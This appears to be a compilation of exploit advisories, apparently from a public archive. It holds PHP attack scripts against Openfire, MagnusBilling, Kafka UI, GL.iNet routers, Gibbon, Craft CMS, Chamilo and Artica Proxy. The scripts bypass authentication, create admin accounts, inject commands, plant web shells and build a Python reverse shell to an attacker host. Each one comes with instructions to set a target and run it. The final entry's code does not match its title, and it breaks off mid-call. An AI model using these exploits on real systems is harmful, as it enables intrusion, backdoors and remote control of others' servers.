Openfire version 4.8.0 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : Openfire release 4.8.0 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.igniterealtime.org/projects/openfire/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 115 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass OpenfireExploit{    private $targetUrl;    private $adminUsername;    private $adminPassword;    private $pluginName;    private $csrfToken;    public function __construct($targetUrl, $adminUsername = null, $adminPassword = null, $pluginName = null)    {        $this->targetUrl = rtrim($targetUrl, '/') . '/';        $this->adminUsername = $adminUsername ?? $this->generateRandomString(8, 15);        $this->adminPassword = $adminPassword ?? $this->generateRandomPassword(8, 10);        $this->pluginName = $pluginName ?? $this->generateRandomString(8, 15);    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);    }    private function generateRandomPassword($minLength, $maxLength)    {        return bin2hex(random_bytes(rand($minLength, $maxLength) / 2));    }    private function sendRequest($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $this->targetUrl . $uri);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        return curl_exec($ch);    }    private function getCsrfToken()    {        $response = $this->sendRequest('GET', 'login.jsp');        preg_match('/csrf=([^;]+)/', $response, $matches);        return $matches[1] ?? null;    }    private function authBypass()    {        $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp');        // Check if we can access the user-groups.jsp page        return $this->sendRequest('GET', 'setup/setup-s/../../../../user-groups.jsp') !== false;    }    private function addAdminUser()    {        $this->csrfToken = $this->getCsrfToken();        $data = http_build_query([            'csrf' => $this->csrfToken,            'username' => $this->adminUsername,            'password' => $this->adminPassword,            'passwordConfirm' => $this->adminPassword,            'isadmin' => 'on',            'create' => 'Create User'        ]);        return $this->sendRequest('POST', 'setup/setup-s/../../../../user-create.jsp', $data);    }    private function uploadPlugin($pluginFilePath)    {        $this->csrfToken = $this->getCsrfToken();        $cfile = new CURLFile($pluginFilePath);        $data = [            'uploadfile' => $cfile,            'csrf' => $this->csrfToken        ];        $headers = ['Content-Type: multipart/form-data'];        return $this->sendRequest('POST', 'plugin-admin.jsp', $data, $headers);    }    public function exploit()    {        if ($this->authBypass()) {            echo "Authentication bypass successful.\n";            if ($this->addAdminUser()) {                echo "Admin user '{$this->adminUsername}' added successfully.\n";                // Prepare plugin JAR file path                $pluginJarPath = '/path/to/plugin.jar'; // Replace with actual path to the JAR file                if ($this->uploadPlugin($pluginJarPath)) {                    echo "Plugin uploaded successfully.\n";                } else {                    echo "Failed to upload plugin.\n";                }            } else {                echo "Failed to add admin user.\n";            }        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new OpenfireExploit('http://target-openfire-url.com');$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Openfire 4.8.0 Code Injection

MagnusBilling version 6.x suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : MagnusBilling 6.x Code Injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://www.magnusbilling.org/                                                                                              |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class MagnusBillingExploit {  
    private $targetUri;  
    private $webShellName;

    public function __construct($targetUri) {  
        $this->targetUri = $targetUri;  
    }

    // Function to execute commands on the target  
    public function executeCommand($cmd) {  
        $url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';  
        return file_get_contents($url); // Send HTTP request  
    }

    // Function to execute PHP code on the target  
    public function executePhp($cmd) {  
        $payload = base64_encode($cmd);  
        $url = $this->targetUri . '/lib/icepay/' . $this->webShellName;  
        $postFields = [$this->postParam => $payload];  
        return $this->sendPostRequest($url, $postFields); // Send POST request  
    }

    // Upload backdoor webshell to the target  
    public function uploadBackdoorWebShell() {  
        // Name of the webshell to be uploaded  
        $this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

        // Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')  
        $backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

        // Encode the webshell content  
        $encodedPayload = base64_encode($backdoorCode);

        // Construct the command to upload the backdoor  
        $cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

        // Execute the command to upload the backdoor  
        return $this->executeCommand($cmd);  
    }

    // Check if the target can be exploited  
    public function check() {  
        $url = $this->targetUri;  
        $response = file_get_contents($url);  
        if (!$response || !preg_match('/MagnusBilling/i', $response)) {  
            return "Safe: Likely not a MagnusBilling application.";  
        }

        $sleepTime = rand(4, 8);  
        $this->executeCommand("sleep {$sleepTime}");  
        sleep($sleepTime); // Simulate blind command injection

        return "Vulnerable: Command injection successful.";  
    }

    // Main function to exploit the target  
    public function exploit() {  
        echo "Uploading backdoor...\n";  
        $result = $this->uploadBackdoorWebShell();  
        if (!$result) {  
            die("Backdoor upload failed.");  
        }  
        echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";  
    }

    // Helper function to send POST requests  
    private function sendPostRequest($url, $postFields) {  
        $options = [  
            'http' => [  
                'method' => 'POST',  
                'header' => 'Content-Type: application/x-www-form-urlencoded',  
                'content' => http_build_query($postFields)  
            ]  
        ];  
        $context = stream_context_create($options);  
        return file_get_contents($url, false, $context);  
    }  
}

// Usage example  
$exploit = new MagnusBillingExploit('http://target-url/mbilling');  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

MagnusBilling 6.x Code Injection 

Kafka UI version 0.7.1 suffers from a remote code injection vulnerability.

    =============================================================================================================================================| # Title     : Kafka UI 0.7.1 Code Injection Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/provectus/kafka-ui/                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 159 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass KafkaUIExploit {    private $target;    private $version;    private $cluster;    private $new_topic;    public function __construct($target) {        $this->target = $target;    }    public function vuln_version() {        $uri = $this->normalize_uri('/actuator/info');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            if (!empty($json_response)) {                if (isset($json_response['build']['version'])) {                    $this->version = ltrim($json_response['build']['version'], 'v');                } elseif (isset($json_response['git']['commit']['id'])) {                    // Git commit versioning (this part should check with a local list if needed)                    $git_commit_id = substr($json_response['git']['commit']['id'], 0, 7);                    // Implement logic to map git commit to version                }                return version_compare($this->version, '0.7.1', '<=') && version_compare($this->version, '0.4.0', '>=');            }        }        return false;    }    public function get_cluster() {        $uri = $this->normalize_uri('/api/clusters');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            foreach ($json_response as $cluster) {                if ($cluster['status'] == 'online' || $cluster['topicCount'] > 0) {                    return $cluster['name'];                }            }        }        return null;    }    public function create_topic($cluster) {        $topic_name = $this->random_string(8);        $post_data = json_encode([            'name' => $topic_name,            'partitions' => 1,            'replicationFactor' => 1,            'configs' => [                'cleanup.policy' => 'delete',                'retention.bytes' => '-1'            ]        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            return $json_response['name'];        }        return null;    }    public function delete_topic($cluster, $topic) {        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic");        $response = $this->send_request('DELETE', $uri, 'application/json');        return $response['status_code'] == 200;    }    public function produce_message($cluster, $topic) {        $post_data = json_encode([            'partition' => 0,            'key' => 'null',            'content' => 'null',            'keySerde' => 'String',            'valueSerde' => 'String'        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic/messages");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        return $response['status_code'] == 200;    }    public function execute_command($cmd) {        $payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"$cmd\").redirectErrorStream(true).start()";        $uri = $this->normalize_uri("/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages");        $params = [            'q' => $payload,            'filterQueryType' => 'GROOVY_SCRIPT',            'attempt' => 2,            'limit' => 100,            'page' => 0,            'seekDirection' => 'FORWARD',            'keySerde' => 'String',            'valueSerde' => 'String',            'seekType' => 'BEGINNING'        ];        return $this->send_request('GET', $uri, 'application/x-www-form-urlencoded', '', $params);    }    public function check() {        if ($this->vuln_version()) {            return "Kafka-ui version: {$this->version} is vulnerable";        }        return "Kafka-ui version is not vulnerable or unknown.";    }    public function exploit() {        $this->cluster = $this->get_cluster();        if (!$this->cluster) {            die("Could not find or connect to an active Kafka cluster.");        }        $this->new_topic = $this->create_topic($this->cluster);        if (!$this->new_topic) {            die("Could not create a new topic.");        }        if (!$this->produce_message($this->cluster, $this->new_topic)) {            die("Failed to trigger Groovy script payload execution.");        }        $this->execute_command('your_command_here'); // Replace with your desired command        if ($this->delete_topic($this->cluster, $this->new_topic)) {            echo "Successfully deleted topic {$this->new_topic}.";        } else {            echo "Could not delete topic {$this->new_topic}. Manual cleanup required.";        }    }    private function send_request($method, $uri, $content_type, $data = '', $params = []) {        // Placeholder for HTTP request logic (curl, file_get_contents, etc.)        // Implement this function with your desired HTTP request library in PHP        return [            'status_code' => 200,            'body' => '{}'        ];    }    private function normalize_uri($path) {        return $this->target . $path;    }    private function random_string($length) {        return bin2hex(random_bytes($length / 2));    }}// Example usage:$exploit = new KafkaUIExploit("http://target.com");echo $exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Kafka UI 0.7.1 Code Injection

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : GL.iNet network 4.4.3 Code Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gl-inet.com/                                                                                                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{    private $targetUri;    private $sid;    private $glinet;    public function __construct($targetUri)    {        $this->targetUri = $targetUri;        $this->glinet = [            'model' => null,            'firmware' => null,            'arch' => null        ];    }    private function send_request($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        $options = [            CURLOPT_URL => $this->targetUri . $uri,            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => $method        ];        if ($data) {            $options[CURLOPT_POSTFIELDS] = $data;            $headers[] = 'Content-Type: application/json';        }        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response ? json_decode($response, true) : null;    }    public function check_vuln_version()    {        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => ['', 'ui', 'check_initialized', []]        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result'])) {            $this->glinet['model'] = $res['result']['model'];            $this->glinet['firmware'] = $res['result']['firmware_version'];        }        // Check for vulnerable models and firmware        switch ($this->glinet['model']) {            case 'sft1200':                $this->glinet['arch'] = 'mipsle';                return version_compare($this->glinet['firmware'], '4.3.6', '==');            case 'ar750':            case 'ar750s':                $this->glinet['arch'] = 'mipsbe';                return version_compare($this->glinet['firmware'], '4.3.7', '==');            // Add more cases as per your requirement        }        return false;    }    public function auth_bypass()    {        if (!empty($this->sid)) {            return $this->sid;        }        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'challenge',            'params' => ['username' => 'root']        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result']['nonce'])) {            $nonce = $res['result']['nonce'];            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";            $pw = '0';            $hash = md5("$username:$pw:$nonce");            $postData = json_encode([                'jsonrpc' => '2.0',                'id' => rand(1000, 9999),                'method' => 'login',                'params' => [                    'username' => $username,                    'hash' => $hash                ]            ]);            $res = $this->send_request('POST', '/rpc', $postData);            if ($res && isset($res['result']['sid'])) {                $this->sid = $res['result']['sid'];                return $this->sid;            }        }        return null;    }    public function execute_command($cmd)    {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => [                $this->sid,                'logread',                'get_system_log',                ['lines' => '', 'module' => "|{$cmd}"]            ]        ]);        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);    }    public function check()    {        if ($this->check_vuln_version()) {            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";        }        return 'Not Vulnerable';    }    public function exploit($command)    {        $this->sid = $this->auth_bypass();        if ($this->sid) {            echo "SID: {$this->sid}\n";            echo "Executing: {$command}\n";            $this->execute_command($command);        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GL.iNet 4.4.3 Code Injection

Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gibbon School Platform 26.0.00 Code Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://gibbonedu.org/                                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{    private $target_uri;    private $username;    private $password;    private $webshell_name;    public function __construct($target_uri, $username, $password, $webshell_name = null)    {        $this->target_uri = $target_uri;        $this->username = $username;        $this->password = $password;        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';    }    private function send_request($method, $url, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function gibbon_login()    {        $login_url = $this->target_uri . '/login.php?timeout=true';        $data = [            'address' => '',            'method' => 'default',            'username' => $this->username,            'password' => $this->password,            'gibbonSchoolYearID' => '025',            'gibboni18nID' => '0002'        ];        return $this->send_request('POST', $login_url, http_build_query($data));    }    private function construct_form_data($payload)    {        $payload_len = strlen($payload);        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';        $form_data = [            'address' => '/modules/System Admin/import_run.php',            'mode' => 'sync',            'syncField' => 'N',            'syncColumn' => '',            'columnOrder' => $payload_data,            'columnText' => 'N;',            'fieldDelimiter' => '%2C',            'stringEnclosure' => '%22',            'filename' => $this->randomString() . '.xlsx',            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',            'ignoreErrors' => '1',            'Failed' => 'Submit'        ];        return $form_data;    }    public function upload_webshell($b64_payload)    {        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;        $form_data = $this->construct_form_data($php_payload);        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';        return $this->send_request('POST', $url, http_build_query($form_data));    }    public function execute_php($cmd)    {        $b64_payload = base64_encode($cmd);        $res = $this->upload_webshell($b64_payload);        if (!$res) {            die('Web shell upload error.');        }        // execute the webshell        $url = $this->target_uri . '/' . $this->webshell_name;        return $this->send_request('GET', $url);    }    private function randomString($length = 10)    {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gibbon School Platform 26.0.00 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://craftcms.com/                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Craft CMS 4.4.14 Code Injection

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                </item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Chamilo 1.11.18 Code Injection

Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.

    =============================================================================================================================================| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://artica-proxy.com/                                                                                                   |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit {    private $targetUri;    private $lhost;    private $lport;    private $shell;    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {        $this->targetUri = $targetUri;        $this->lhost = $lhost;        $this->lport = $lport;        $this->shell = $shell;    }    public function sendRequest($method, $url, $data = null, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function checkWatchGuardFirebox() {        $url = $this->targetUri . '/auth/login';        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);                if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false             && strpos($response, 'Firebox') !== false) {            return true;        }        return false;    }    public function createBofPayload() {        // Generate the buffer overflow payload with Python reverse shell code        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric        $pyFilename = "/tmp/" . $randomStr . ".py";        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";        $payload .= str_repeat('<BBBBMFA>', 3680);        // Include a Python reverse shell command as the payload        $payload .= 'import socket;from subprocess import call; from os import dup2;';        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';        $payload .= 'call(["' . $this->shell . '","-i"]);';        $payload .= 'import os; os.remove("' . $pyFilename . '");';        return gzencode($payload); // gzip encoding    }    public function exploit() {        if (!$this->checkWatchGuardFirebox()) {            echo "Target is not vulnerable.\n";            return;        }        echo "Target is vulnerable. Sending exploit...\n";        $bofPayload = $this->createBofPayload();        // Send the buffer overflow payload        $url = $this->targetUri . '/agent/login';        $this->sendRequest('POST', $url, $bofPayload, [            